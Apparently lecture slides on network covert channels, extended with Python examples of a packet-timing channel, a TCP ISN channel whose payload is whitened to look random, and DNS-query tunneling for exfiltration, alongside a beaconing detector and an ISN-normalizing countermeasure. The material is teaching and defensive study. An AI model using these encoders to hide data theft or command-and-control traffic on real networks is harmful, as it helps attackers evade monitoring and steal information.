Covert Channels Thomas Arnold CSCI 5235/Summer 2010 7/12/2010.

Outline
- Background
- Covert Channel Designs
- Detection Methods
- Example: Passive Covert Channel
- Example: Tunneling with NDIS

What are covert channels?
- You want to communicate with someone without being observed
- Cryptography/encryption is not good enough
  – You want to hide the fact that you are communicating at all
  – The usual way is to hide the communication inside innocuous-looking network traffic or data
  – The carrier traffic must be something the firewall already lets through

Why would you need covert channels?
- Stealing confidential information
  – Government/corporate espionage, intelligence gathering on criminal/terrorist activity
- Malware
  – Rootkits, keyloggers, botnets, etc. (command-and-control and exfiltration)

Covert Channel Techniques
- Storage channels
  – Hide data in TCP/IP header fields that are unused or not checked closely by middleboxes
  – TCP flags field, TCP ISN, IP ID, etc.
- Timing channels
  – Modulate a shared resource (packet timing, packet rate) in such a way that a receiver observing it can decode the message
  – Port knocking, varying packet rates, etc.
- Steganography
  – Hide messages in images and other innocuous-looking data
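A timing channel is the least intuitive of the three, so here is a worked example. It is added for this page and is not code from the slides: the sender encodes each bit of the message as the gap before the next packet (a short gap for 0, a long gap for 1), and the receiver reconstructs the message from arrival timestamps alone, never looking at payload. The gap lengths, the decoding threshold and the simulated jitter are hypothetical values chosen for the demonstration.

```python
import random

# Hypothetical parameters (assumption, not from the slides): a 0 bit is sent
# after a short gap and a 1 bit after a long gap. The receiver's threshold
# sits halfway between them, so jitter below (LONG_GAP - SHORT_GAP) / 2
# does not corrupt the decode.
SHORT_GAP = 0.050   # seconds
LONG_GAP = 0.200    # seconds
THRESHOLD = (SHORT_GAP + LONG_GAP) / 2


def bytes_to_bits(data: bytes) -> list:
    """MSB-first bit list of a byte string."""
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]


def bits_to_bytes(bits: list) -> bytes:
    """Inverse of bytes_to_bits; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def encode_gaps(message: bytes) -> list:
    """Sender side: one inter-packet gap per bit of the message."""
    return [LONG_GAP if bit else SHORT_GAP for bit in bytes_to_bits(message)]


def send_times(gaps: list, start: float = 0.0, jitter: float = 0.0, seed: int = 1) -> list:
    """Turn the gaps into packet arrival timestamps. The first packet is a
    sync packet; optional network jitter is simulated with a fixed seed so
    the example is reproducible."""
    rng = random.Random(seed)
    times = [start]
    for gap in gaps:
        times.append(times[-1] + gap + rng.uniform(-jitter, jitter))
    return times


def decode_times(times: list) -> bytes:
    """Receiver side: it sees only arrival timestamps, never the payload."""
    bits = [1 if (later - earlier) > THRESHOLD else 0
            for earlier, later in zip(times, times[1:])]
    return bits_to_bytes(bits)


def bits_per_second(message: bytes) -> float:
    """Throughput of the channel for a given message; it is tiny, which is
    the price of being invisible to payload inspection."""
    gaps = encode_gaps(message)
    return len(gaps) / sum(gaps)


if __name__ == "__main__":
    arrivals = send_times(encode_gaps(b"covert"), jitter=0.04)
    print(decode_times(arrivals), round(bits_per_second(b"covert"), 2), "bit/s")
```

The same structure applies to port knocking, where the "gap" is replaced by the choice of destination port, and to rate modulation, where the receiver counts packets per interval instead of timing single packets. Note the throughput: under ten bits per second here, which is why timing channels are used for short command-and-control messages rather than bulk exfiltration.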

Detection/Prevention
- Detection
  – Network traffic analysis
  – Higher bandwidth usage than the host's normal profile
  – Unusual formatting of HTTP headers (a hand-rolled client does not look like a browser)
  – Request regularity: periodic connections to the same destination (beaconing)
- Prevention
  – Block susceptible outbound ports/protocols
  – Proxy or normalize the protocols you must allow, so header fields are rewritten rather than passed through untouched
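The "request regularity" heuristic is easy to turn into a detection, so here is an added example (Python, not from the slides) that runs it over a constructed connection log. For each source/destination pair it computes the inter-arrival gaps and their coefficient of variation (standard deviation divided by mean); a flow with many connections and a near-zero coefficient is a periodic beacon. The log format, the minimum connection count and the coefficient threshold are assumptions chosen for the demonstration.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not from the slides): "timestamp src dst:port".
# 10.0.0.5 talks to one host every 60 s exactly; 10.0.0.9 browses irregularly.
SAMPLE_LOG = """\
2010-07-12T09:00:00 10.0.0.5 203.0.113.7:443
2010-07-12T09:00:02 10.0.0.9 198.51.100.4:80
2010-07-12T09:01:00 10.0.0.5 203.0.113.7:443
2010-07-12T09:01:37 10.0.0.9 198.51.100.4:80
2010-07-12T09:02:00 10.0.0.5 203.0.113.7:443
2010-07-12T09:02:05 10.0.0.9 198.51.100.4:80
2010-07-12T09:03:00 10.0.0.5 203.0.113.7:443
2010-07-12T09:03:51 10.0.0.9 198.51.100.4:80
2010-07-12T09:04:00 10.0.0.5 203.0.113.7:443
2010-07-12T09:04:09 10.0.0.9 198.51.100.4:80
"""

# Hypothetical tuning values; real deployments derive them from a baseline.
MIN_CONNECTIONS = 4
MAX_CV = 0.1


def parse_log(text: str) -> dict:
    """Group connection timestamps by (src, dst) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def regularity(times: list) -> tuple:
    """Return (mean gap in seconds, coefficient of variation of the gaps).
    A CV near 0 means the connections are evenly spaced."""
    times = sorted(times)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else float("inf")
    return mean, cv


def find_beacons(text: str, min_connections: int = MIN_CONNECTIONS, max_cv: float = MAX_CV) -> dict:
    """Flows with enough connections and a CV at or below the threshold."""
    hits = {}
    for flow, times in parse_log(text).items():
        if len(times) < min_connections:
            continue
        mean, cv = regularity(times)
        if cv <= max_cv:
            hits[flow] = (mean, cv)
    return hits


if __name__ == "__main__":
    for (src, dst), (mean, cv) in find_beacons(SAMPLE_LOG).items():
        print(f"beacon candidate {src} -> {dst}: every {mean:.0f}s (cv={cv:.2f})")
```

The caveat a practitioner should keep in mind: an implant that adds random jitter to its beacon interval raises the CV above any fixed threshold, so in practice this check is combined with the other signals on the slide (volume relative to baseline, client header formatting, destination reputation) rather than used alone.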

Example: Passive TCP Covert Channels
- The technique rides on existing traffic; it does not generate its own
- Requires that the attacker also control a network gateway on the path
- Uses the TCP ISN (initial sequence number) field to transmit data
  – The sender replaces the ISN of each new connection with the covert data
  – The compromised gateway reads the secret out of the ISN for the attacker and forwards the legitimate traffic to its intended destination unchanged
- Pros/Cons
  – Blends in with existing traffic, difficult to detect
  – ISN values must not look conspicuous (a real ISN is effectively random, so the covert data must be too), and the gateway processing needed to extract the secret while forwarding the legitimate traffic can be very complicated
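An added example of the ISN storage channel, written for this page and not taken from the slides or from any published tool. The sender builds one TCP SYN per 32-bit word of the message and puts the word in the ISN field; a receiver on the path extracts the ISNs of pure SYNs and reassembles the message. The words are XORed with a keystream derived from a shared key so that the ISNs look like the random values a normal stack would pick, which is the "must not look conspicuous" point above. It also includes the defender's answer, a normalizing gateway that rewrites every ISN. The shared key, ports and the length-prefix framing are assumptions; the checksum is left at zero because computing it needs the IP pseudo-header, which this example does not model.

```python
import hashlib
import hmac
import random
import struct

# Assumption (not from the slides): a shared key whitens the payload so the
# ISNs are indistinguishable from random 32-bit values to an observer.
SHARED_KEY = b"example-key-0123"
TCP_SYN = 0x02
HDR_FMT = "!HHIIHHHH"   # 20-byte TCP header, no options


def build_tcp_syn(src_port: int, dst_port: int, isn: int) -> bytes:
    """Bare TCP SYN header. The checksum stays 0 here; a real sender fills it
    in over the IP pseudo-header."""
    return struct.pack(HDR_FMT, src_port, dst_port, isn, 0,
                       (5 << 12) | TCP_SYN, 8192, 0, 0)


def parse_tcp(header: bytes) -> dict:
    src, dst, seq, _ack, off_flags, _win, _csum, _urg = struct.unpack(HDR_FMT, header[:20])
    return {"src": src, "dst": dst, "seq": seq, "flags": off_flags & 0x1FF}


def keystream_word(index: int) -> int:
    """Pseudo-random 32-bit word derived from the key and the packet index."""
    mac = hmac.new(SHARED_KEY, index.to_bytes(4, "big"), hashlib.sha256).digest()
    return int.from_bytes(mac[:4], "big")


def encode_isns(message: bytes) -> list:
    """Sender: a length word, then 4-byte chunks, each XORed with the keystream."""
    words = [len(message)]
    padded = message + b"\x00" * (-len(message) % 4)
    words += [int.from_bytes(padded[i:i + 4], "big") for i in range(0, len(padded), 4)]
    return [w ^ keystream_word(i) for i, w in enumerate(words)]


def decode_isns(isns: list) -> bytes:
    words = [isn ^ keystream_word(i) for i, isn in enumerate(isns)]
    if not words:
        return b""
    length = words[0]
    body = b"".join(w.to_bytes(4, "big") for w in words[1:])
    return body[:length]


def send(message: bytes, src_port: int = 40000, dst_port: int = 80) -> list:
    """Emit one SYN per word; each 'connection' gets a fresh source port."""
    return [build_tcp_syn(src_port + i, dst_port, isn)
            for i, isn in enumerate(encode_isns(message))]


def passive_receiver(packets: list) -> bytes:
    """The compromised gateway: reads the ISN of every pure SYN and forwards the
    packets untouched, so the legitimate connections still complete."""
    isns = [parse_tcp(p)["seq"] for p in packets if parse_tcp(p)["flags"] == TCP_SYN]
    return decode_isns(isns)


def normalizing_gateway(packets: list, seed: int = 7) -> list:
    """Defender-side countermeasure: rewrite every SYN's ISN with a fresh random
    value. The covert channel is destroyed. (A real normalizer must also
    translate sequence numbers for the rest of each flow; this toy omits that.)"""
    rng = random.Random(seed)
    out = []
    for p in packets:
        h = parse_tcp(p)
        if h["flags"] == TCP_SYN:
            p = build_tcp_syn(h["src"], h["dst"], rng.getrandbits(32))
        out.append(p)
    return out


if __name__ == "__main__":
    pkts = send(b"secret data")
    print("receiver sees:", passive_receiver(pkts))
    print("after normalizer:", passive_receiver(normalizing_gateway(pkts)))
```

Two observations follow from running it. The channel carries four bytes per connection, so it needs a host that opens many connections; and a defender does not need to detect the channel to break it, since an ISN-rewriting proxy or normalizer removes it as a side effect.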

Example: Tunneling using NDIS
- The idea is to tunnel information inside protocols that are already allowed out, such as HTTP, DNS and ICMP
- Pros/Cons of each protocol
  – HTTP is good for large data transfers, but more conspicuous
  – DNS is not great for data transfer (small, slow, very visible in query logs), but good for C&C
  – ICMP is good for C&C but is often blocked at the perimeter
- The author of The Rootkit Arsenal proposes going further: writing your own TCP/IP stack on top of the Microsoft Windows NDIS interface
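The DNS case is worth a worked example because its limits are what make it "not great for data transfer". The following is added for this page and is not code from the slides: the client splits a payload into DNS query names under an attacker-controlled zone, respecting the 63-byte label and 253-byte name limits from RFC 1035, and the server reassembles the payload from the names it receives, tolerating out-of-order arrival. Base32 rather than base64 is used because resolvers may change the case of a name. The zone name, the sequence/session framing and the session id are assumptions.

```python
import base64

# Hypothetical attacker-controlled zone (assumption, not from the slides).
TUNNEL_DOMAIN = "t.example.net"
MAX_LABEL = 63      # RFC 1035 label limit
MAX_NAME = 253      # RFC 1035 name limit in presentation form


def to_b32(data: bytes) -> str:
    """DNS names are case-insensitive, so base32 (not base64) survives resolvers."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def from_b32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(session: int, payload: bytes) -> list:
    """Client: split payload into names of the form
    <seq>-<session>.<data label>[.<data label>...].<TUNNEL_DOMAIN>"""
    suffix_len = len(TUNNEL_DOMAIN) + 1            # ".t.example.net"
    budget = MAX_NAME - suffix_len - len("000-0000.")
    labels_per_query = budget // (MAX_LABEL + 1)   # each label costs 63 + a dot
    chars_per_query = labels_per_query * MAX_LABEL
    bytes_per_query = chars_per_query // 8 * 5     # base32: 8 chars per 5 bytes
    names = []
    for seq, off in enumerate(range(0, len(payload), bytes_per_query)):
        enc = to_b32(payload[off:off + bytes_per_query])
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        names.append(f"{seq:03d}-{session:04x}." + ".".join(labels) + "." + TUNNEL_DOMAIN)
    return names


def decode_queries(names: list) -> dict:
    """Server: reassemble payloads per session from the query names it saw,
    in whatever order they arrived. Returns {session: payload}."""
    sessions = {}
    for name in names:
        if not name.endswith("." + TUNNEL_DOMAIN):
            continue
        labels = name[:-len(TUNNEL_DOMAIN) - 1].split(".")
        seq_s, sid_s = labels[0].split("-")
        chunk = from_b32("".join(labels[1:]))
        sessions.setdefault(int(sid_s, 16), {})[int(seq_s)] = chunk
    return {sid: b"".join(chunks[k] for k in sorted(chunks)) for sid, chunks in sessions.items()}


if __name__ == "__main__":
    qs = encode_queries(0x1A2B, b"exfiltrated bytes " * 20)
    print(len(qs), "queries, longest name", max(len(q) for q in qs), "chars")
    print(qs[0])
    print(decode_queries(list(reversed(qs)))[0x1A2B][:30])
```

With this zone name each query carries 115 bytes of payload, so a megabyte needs roughly nine thousand queries, each of them a 200-character, high-entropy name that any DNS log review will notice. That is the trade-off the slide summarizes: fine for a few hundred bytes of C&C, poor for bulk transfer.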

Example: Tunneling using NDIS
- Since you already have root (kernel) privileges, you can implement a kernel-mode NDIS driver
  – Complete control: it can act as its own NIC, use its own MAC/IP addresses, and format every protocol header however you wish
- Built-in diagnostic tools such as ipconfig, netstat, etc. (as well as host firewalls) cannot see it, because they look at the native TCP/IP stack and this traffic never passes through it
  – Caveat: the packets still appear on the wire, so a network tap, SPAN port or IDS outside the host sees them; the stealth is against host-based inspection only
- Pros/Cons
  – Extremely difficult to detect from the host, but also hard to implement